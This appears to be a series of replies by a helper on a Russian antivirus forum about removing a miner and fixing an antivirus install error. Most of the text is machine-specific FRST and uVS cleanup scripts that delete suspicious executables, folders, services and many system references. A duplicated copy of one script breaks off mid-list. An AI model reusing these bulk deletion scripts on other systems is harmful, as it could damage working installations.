[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] запуск майнера на серверах с MS Exchange 2013

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 21.08.2021 13:06:49

Цитата
Владимир Шариков написал: Спасибо. Сейчас буду проверять всё что ниписали. Но с того момента как заблокировал всю хетслерскую сеть, так уже вторую неделю не видим проблем. Но проверять нужно.

а по логам DNS можете проверить, были из внутренней сети попытки подключения на заблокированные адреса?

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] Ошибка при установке антивирусника MSI.1303

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 14.08.2021 14:49:04

проверьте сейчас возможность установки

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] Ошибка при установке антивирусника MSI.1303

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 14.08.2021 13:44:15

Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

Код
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ 2021-08-11 22:17 - 2020-10-10 17:46 - 000000000 __SHD C:\AdwCleaner 2021-08-11 23:43 - 2021-03-09 22:20 - 000000000 __SHD C:\Program Files\RDP Wrapper 2021-08-12 22:32 - 2021-05-02 21:44 - 000000000 __SHD C:\ProgramData\Setup 2021-08-12 22:26 - 2020-10-10 17:46 - 000000000 __SHD C:\ProgramData\install 2021-08-13 23:38 - 2021-03-09 22:20 - 000000000 __SHD C:\rdp 2020-10-10 17:46 C:\KVRT_Data 2020-10-10 17:46 C:\Program Files\AVAST Software 2020-10-10 17:46 C:\Program Files\AVG 2020-10-10 17:46 C:\Program Files\Cezurity 2020-10-10 17:46 C:\Program Files\COMODO 2020-10-10 17:46 C:\Program Files\Enigma Software Group 2020-10-10 17:46 C:\Program Files\ESET 2020-10-10 17:46 C:\Program Files\Kaspersky Lab 2020-10-10 17:46 C:\Program Files\Malwarebytes 2020-10-10 17:46 C:\Program Files\SpyHunter 2020-10-10 17:46 C:\Program Files (x86)\360 2020-10-10 17:46 C:\Program Files (x86)\AVAST Software 2020-10-10 17:46 C:\Program Files (x86)\AVG 2020-10-10 17:46 C:\Program Files (x86)\Cezurity 2020-10-10 17:46 C:\Program Files (x86)\GRIZZLY Antivirus 2020-10-10 17:46 C:\Program Files (x86)\Kaspersky Lab 2020-10-10 17:46 C:\Program Files (x86)\Microsoft JDX 2020-10-10 17:46 C:\Program Files (x86)\Panda Security 2020-10-10 17:46 C:\Program Files (x86)\SpyHunter 2020-10-10 17:46 C:\Windows\speechstracing 2020-10-10 17:46 C:\Program Files\Common Files\McAfee 2020-10-10 17:46 C:\ProgramData\360safe 2020-10-10 17:46 C:\ProgramData\Avira 2020-10-10 17:46 C:\ProgramData\Doctor Web 2020-10-10 17:46 C:\ProgramData\ESET 2020-10-10 17:46 C:\ProgramData\grizzly 2020-10-10 17:46 C:\ProgramData\Indus 2020-10-10 17:46 C:\ProgramData\Kaspersky Lab 2020-10-10 17:46 C:\ProgramData\Kaspersky Lab Setup Files 2020-10-10 17:46 C:\ProgramData\Malwarebytes 2020-10-10 17:46 C:\ProgramData\MB3Install 2020-10-10 17:46 C:\ProgramData\McAfee 2020-10-10 17:46 C:\ProgramData\Norton EmptyTemp: Reboot:

Код

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
2021-08-11 22:17 - 2020-10-10 17:46 - 000000000 __SHD C:\AdwCleaner
2021-08-11 23:43 - 2021-03-09 22:20 - 000000000 __SHD C:\Program Files\RDP Wrapper
2021-08-12 22:32 - 2021-05-02 21:44 - 000000000 __SHD C:\ProgramData\Setup
2021-08-12 22:26 - 2020-10-10 17:46 - 000000000 __SHD C:\ProgramData\install
2021-08-13 23:38 - 2021-03-09 22:20 - 000000000 __SHD C:\rdp

2020-10-10 17:46 C:\KVRT_Data
2020-10-10 17:46 C:\Program Files\AVAST Software
2020-10-10 17:46 C:\Program Files\AVG
2020-10-10 17:46 C:\Program Files\Cezurity
2020-10-10 17:46 C:\Program Files\COMODO
2020-10-10 17:46 C:\Program Files\Enigma Software Group
2020-10-10 17:46 C:\Program Files\ESET
2020-10-10 17:46 C:\Program Files\Kaspersky Lab
2020-10-10 17:46 C:\Program Files\Malwarebytes
2020-10-10 17:46 C:\Program Files\SpyHunter
2020-10-10 17:46 C:\Program Files (x86)\360
2020-10-10 17:46 C:\Program Files (x86)\AVAST Software
2020-10-10 17:46 C:\Program Files (x86)\AVG
2020-10-10 17:46 C:\Program Files (x86)\Cezurity
2020-10-10 17:46 C:\Program Files (x86)\GRIZZLY Antivirus
2020-10-10 17:46 C:\Program Files (x86)\Kaspersky Lab
2020-10-10 17:46 C:\Program Files (x86)\Microsoft JDX
2020-10-10 17:46 C:\Program Files (x86)\Panda Security
2020-10-10 17:46 C:\Program Files (x86)\SpyHunter
2020-10-10 17:46 C:\Windows\speechstracing
2020-10-10 17:46 C:\Program Files\Common Files\McAfee
2020-10-10 17:46 C:\ProgramData\360safe
2020-10-10 17:46 C:\ProgramData\Avira
2020-10-10 17:46 C:\ProgramData\Doctor Web
2020-10-10 17:46 C:\ProgramData\ESET
2020-10-10 17:46 C:\ProgramData\grizzly
2020-10-10 17:46 C:\ProgramData\Indus
2020-10-10 17:46 C:\ProgramData\Kaspersky Lab
2020-10-10 17:46 C:\ProgramData\Kaspersky Lab Setup Files
2020-10-10 17:46 C:\ProgramData\Malwarebytes
2020-10-10 17:46 C:\ProgramData\MB3Install
2020-10-10 17:46 C:\ProgramData\McAfee
2020-10-10 17:46 C:\ProgramData\Norton

EmptyTemp:
Reboot:

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] Ошибка при установке антивирусника MSI.1303

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 14.08.2021 07:49:43

Код
;uVS v4.11.8 [http://dsrt.dyndns.org:8888] ;Target OS: NTv10.0 v400c OFFSGNSAVE regt 18 ;------------------------autoscript--------------------------- delall %SystemDrive%\PROGRAMDATA\REALTEKHD\TASKHOST.EXE delall %SystemDrive%\PROGRAMDATA\REALTEKHD\TASKHOSTW.EXE delall %SystemDrive%\PROGRAMDATA\WINDOWSTASK\WINLOGON.EXE delall %SystemDrive%\USERS\ALEX\APPDATA\ROAMING\MICROSOFT\WINDOWS\HELPER.EXE delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DEFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ%26INSTALLSOURCE%3DONDEMAND%26UC delref HTTP://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DLDGPJDIADOMHINPIMGCHMEEMBBGOJNJK%26INSTALLSOURCE%3DONDEMAND%26UC apply deltmp delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F C:\PROGRAMDATA\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM delref %SystemDrive%\USERS\ALEX\APPDATA\LOCAL\TEMP\{D4FCC862-EDED-469A-8F56-FA818FD48E7D}-92.0.4515.131_CHROME_INSTALLER.EXE delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID] delref %SystemRoot%\SYSWOW64\MAPSTOASTTASK.DLL delref %SystemRoot%\SYSWOW64\MAPSUPDATETASK.DLL delref %SystemDrive%\PROGRAM FILES (X86)\IOBIT\IOBIT MALWARE FIGHTER\SUMP.EXE delref %SystemRoot%\SYSWOW64\GPSVC.DLL delref %SystemRoot%\SYSWOW64\VID.DLL delref %SystemRoot%\SYSWOW64\WEVTSVC.DLL delref %SystemRoot%\SYSWOW64\DRIVERS\TCPIP.SYS delref %SystemRoot%\SYSWOW64\DRIVERS\MRXSMB.SYS delref %SystemRoot%\SYSWOW64\W32TIME.DLL delref %SystemRoot%\SYSWOW64\DRIVERS\NDIS.SYS delref %SystemRoot%\SYSWOW64\DRIVERS\USBXHCI.SYS delref %SystemRoot%\SYSWOW64\DRIVERS\SRV2.SYS delref %SystemRoot%\SYSWOW64\RDPCORETS.DLL delref %SystemRoot%\SYSWOW64\DRIVERS\DXGMMS2.SYS delref %SystemRoot%\SYSWOW64\DRIVERS\HTTP.SYS delref %SystemRoot%\SYSWOW64\DRIVERS\WINNAT.SYS delref %SystemRoot%\SYSWOW64\UMPOEXT.DLL delref %SystemRoot%\SYSWOW64\DRIVERS\VMBUSR.SYS delref %SystemRoot%\SYSWOW64\BTHSERV.DLL delref %SystemRoot%\SYSWOW64\DRIVERS\DMVSC.SYS delref %SystemRoot%\SYSWOW64\IPHLPSVC.DLL delref %SystemRoot%\SYSWOW64\DRIVERS\VMBKMCL.SYS delref %SystemRoot%\SYSWOW64\DRIVERS\REFS.SYS delref %SystemRoot%\SYSWOW64\DRIVERS\SPACEPORT.SYS delref %SystemRoot%\SYSWOW64\DRIVERS\FVEVOL.SYS delref %SystemRoot%\SYSWOW64\DRIVERS\AFD.SYS delref %SystemRoot%\SYSWOW64\PNRPSVC.DLL delref %SystemRoot%\SYSWOW64\DRIVERS\PACER.SYS delref %SystemRoot%\SYSWOW64\HVHOSTSVC.DLL delref %SystemRoot%\SYSWOW64\LSM.DLL delref %SystemRoot%\SYSWOW64\DRIVERS\SYNTH3DVSC.SYS delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID] delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID] delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID] delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID] delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID] delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID] delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID] delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID] delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID] delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID] delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID] delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID] delref %SystemRoot%\SYSWOW64\IE4USHOWIE.EXE delref %SystemRoot%\SYSWOW64\IE4UINIT.EXE delref {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}\[CLSID] delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\88.0.4324.182\INSTALLER\CHRMSTP.EXE delref %SystemRoot%\SYSWOW64\BLANK.HTM delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID] delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID] delref %Sys32%\DRIVERS\VMBUSR.SYS delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\90.0.818.66\MSEDGE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT OFFICE\ROOT\OFFICE16\WWLIB.DLL delref %Sys32%\DRIVERS\UMDF\USBCCIDDRIVER.DLL delref %Sys32%\BLANK.HTM delref SLDWORKS SHELL EXTENSION\[CLSID] delref %Sys32%\DRIVERS\53912204.SYS delref %Sys32%\DRIVERS\59163187.SYS delref %Sys32%\DRIVERS\HDAUDADDSERVICE.SYS delref HELPSVC\[SERVICE] delref SACSVR\[SERVICE] delref SWPRV\[SERVICE] delref TBS\[SERVICE] delref VMMS\[SERVICE] delref BROWSER\[SERVICE] delref MESSENGER\[SERVICE] delref RDSESSMGR\[SERVICE] delref %SystemDrive%\PROGRAM FILES (X86)\FINALWIRE\AIDA64 EXTREME\KERNELD.X64 delref %SystemRoot%\TEMP\CPUZ149\CPUZ149_X64.SYS delref %Sys32%\DRIVERS\EW_HWUSBDEV.SYS delref %Sys32%\DRIVERS\EW_USBENUMFILTER.SYS delref %Sys32%\DRIVERS\EW_JUCDCACM.SYS delref %Sys32%\DRIVERS\EW_JUBUSENUM.SYS delref %Sys32%\DRIVERS\EW_CDCACM.SYS delref %Sys32%\DRIVERS\EW_WWANECM.SYS delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F %PROGRAMDATA%\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM delref IRENUM\[SERVICE] delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected] delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected] delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected] delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected] delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected] delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected] delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.135.41\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.137.99\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.82\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.137.93\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.32\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.72\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.143.57\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.145.49\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.52\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.63\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.59\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.34.11\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.35.452\PSMACHINE_64.DLL delref %Sys32%\TETHERINGSETTINGHANDLER.DLL delref %Sys32%\QUICKACTIONSPS.DLL delref %Sys32%\VAILAUDIOPROXY.EXE delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.135.49\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.133.5\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.59\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.71\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\DAO\DAO360.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.135.41\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.137.99\PSMACHINE.DLL delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SPEECHRUNTIME.EXE delref %SystemRoot%\SYSWOW64\TAPILUA.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.82\PSMACHINE.DLL delref %SystemRoot%\SYSWOW64\UPDATEDEPLOYMENTPROVIDER.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.137.93\PSMACHINE.DLL delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\U0358081.INF_AMD64_A86BE533E3770962\B357961\AMDHWDECODER_32.DLL delref %SystemRoot%\SYSWOW64\LOCATIONFRAMEWORK.DLL delref %SystemRoot%\SYSWOW64\MAPSBTSVCPROXY.DLL delref D:\CHECKVER.OCX delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.32\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.72\PSMACHINE.DLL delref %SystemRoot%\SYSWOW64\COMPPKGSRV.EXE delref %SystemRoot%\SYSWOW64\EAPPCFGUI.DLL delref D:\DRIVERCDHTML.OCX delref %SystemRoot%\SYSWOW64\AUTHHOSTPROXY.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.143.57\PSMACHINE.DLL delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\U0358081.INF_AMD64_A86BE533E3770962\B357961\AMDH265ENC32.DLL delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\NVENCMFTH264.DLL delref %SystemRoot%\SYSWOW64\WPCREFRESHTASK.DLL delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\U0358081.INF_AMD64_A86BE533E3770962\B357961\AMF-MFT-MJPEG-DECODER32.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.145.49\PSMACHINE.DLL delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\NVDECMFTMJPEG.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.52\PSMACHINE.DLL delref %SystemRoot%\SYSWOW64\RMSROAMINGSECURITY.DLL delref %SystemRoot%\SYSWOW64\SYSTEMSETTINGSBROKER.EXE delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.63\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.59\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.34.11\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.35.452\PSMACHINE.DLL delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SAPI_EXTENSIONS.DLL delref %SystemRoot%\SYSWOW64\SMARTSCREEN.EXE delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\U0358081.INF_AMD64_A86BE533E3770962\B357961\AMDH264ENC32.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.135.49\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.133.5\PSMACHINE.DLL delref %SystemRoot%\SYSWOW64\IDLISTEN.DLL delref %SystemRoot%\SYSWOW64\WIFICONFIGSP.DLL delref %SystemDrive%\PROGRAM FILES\COMMON FILES\SYSTEM\OLE DB\MSDAORA.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.59\PSMACHINE.DLL delref %SystemRoot%\SYSWOW64\WIREDNETWORKCSP.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.71\PSMACHINE.DLL delref D:\AUTORUN.EXE delref I:\HISUITEDOWNLOADER.EXE delref D:\HISUITEDOWNLOADER.EXE delref D:\STARTME.EXE delref H:\HISUITEDOWNLOADER.EXE delref %SystemDrive%\USERS\ALEX\APPDATA\LOCAL\ESET\ESETONLINESCANNER\ESETONLINESCANNER.EXE delref G:\ГАРРИ\SYSTEM\HP.EXE delref G:\ГАРРИ\UNINST.EXE ;------------------------------------------------------------- restart

Код


;uVS v4.11.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
regt 18
;------------------------autoscript---------------------------

delall %SystemDrive%\PROGRAMDATA\REALTEKHD\TASKHOST.EXE
delall %SystemDrive%\PROGRAMDATA\REALTEKHD\TASKHOSTW.EXE
delall %SystemDrive%\PROGRAMDATA\WINDOWSTASK\WINLOGON.EXE
delall %SystemDrive%\USERS\ALEX\APPDATA\ROAMING\MICROSOFT\WINDOWS\HELPER.EXE
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DEFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTP://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DLDGPJDIADOMHINPIMGCHMEEMBBGOJNJK%26INSTALLSOURCE%3DONDEMAND%26UC
apply

deltmp
delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F C:\PROGRAMDATA\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM
delref %SystemDrive%\USERS\ALEX\APPDATA\LOCAL\TEMP\{D4FCC862-EDED-469A-8F56-FA818FD48E7D}-92.0.4515.131_CHROME_INSTALLER.EXE
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref %SystemRoot%\SYSWOW64\MAPSTOASTTASK.DLL
delref %SystemRoot%\SYSWOW64\MAPSUPDATETASK.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\IOBIT\IOBIT MALWARE FIGHTER\SUMP.EXE
delref %SystemRoot%\SYSWOW64\GPSVC.DLL
delref %SystemRoot%\SYSWOW64\VID.DLL
delref %SystemRoot%\SYSWOW64\WEVTSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\TCPIP.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\MRXSMB.SYS
delref %SystemRoot%\SYSWOW64\W32TIME.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\NDIS.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\USBXHCI.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\SRV2.SYS
delref %SystemRoot%\SYSWOW64\RDPCORETS.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\DXGMMS2.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\HTTP.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\WINNAT.SYS
delref %SystemRoot%\SYSWOW64\UMPOEXT.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\VMBUSR.SYS
delref %SystemRoot%\SYSWOW64\BTHSERV.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\DMVSC.SYS
delref %SystemRoot%\SYSWOW64\IPHLPSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\VMBKMCL.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\REFS.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\SPACEPORT.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\FVEVOL.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\AFD.SYS
delref %SystemRoot%\SYSWOW64\PNRPSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\PACER.SYS
delref %SystemRoot%\SYSWOW64\HVHOSTSVC.DLL
delref %SystemRoot%\SYSWOW64\LSM.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\SYNTH3DVSC.SYS
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref %SystemRoot%\SYSWOW64\IE4USHOWIE.EXE
delref %SystemRoot%\SYSWOW64\IE4UINIT.EXE
delref {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}\[CLSID]
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\88.0.4324.182\INSTALLER\CHRMSTP.EXE
delref %SystemRoot%\SYSWOW64\BLANK.HTM
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref %Sys32%\DRIVERS\VMBUSR.SYS
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\90.0.818.66\MSEDGE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT OFFICE\ROOT\OFFICE16\WWLIB.DLL
delref %Sys32%\DRIVERS\UMDF\USBCCIDDRIVER.DLL
delref %Sys32%\BLANK.HTM
delref SLDWORKS SHELL EXTENSION\[CLSID]
delref %Sys32%\DRIVERS\53912204.SYS
delref %Sys32%\DRIVERS\59163187.SYS
delref %Sys32%\DRIVERS\HDAUDADDSERVICE.SYS
delref HELPSVC\[SERVICE]
delref SACSVR\[SERVICE]
delref SWPRV\[SERVICE]
delref TBS\[SERVICE]
delref VMMS\[SERVICE]
delref BROWSER\[SERVICE]
delref MESSENGER\[SERVICE]
delref RDSESSMGR\[SERVICE]
delref %SystemDrive%\PROGRAM FILES (X86)\FINALWIRE\AIDA64 EXTREME\KERNELD.X64
delref %SystemRoot%\TEMP\CPUZ149\CPUZ149_X64.SYS
delref %Sys32%\DRIVERS\EW_HWUSBDEV.SYS
delref %Sys32%\DRIVERS\EW_USBENUMFILTER.SYS
delref %Sys32%\DRIVERS\EW_JUCDCACM.SYS
delref %Sys32%\DRIVERS\EW_JUBUSENUM.SYS
delref %Sys32%\DRIVERS\EW_CDCACM.SYS
delref %Sys32%\DRIVERS\EW_WWANECM.SYS
delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F %PROGRAMDATA%\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM
delref IRENUM\[SERVICE]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.135.41\PSMACHINE_64.DLL
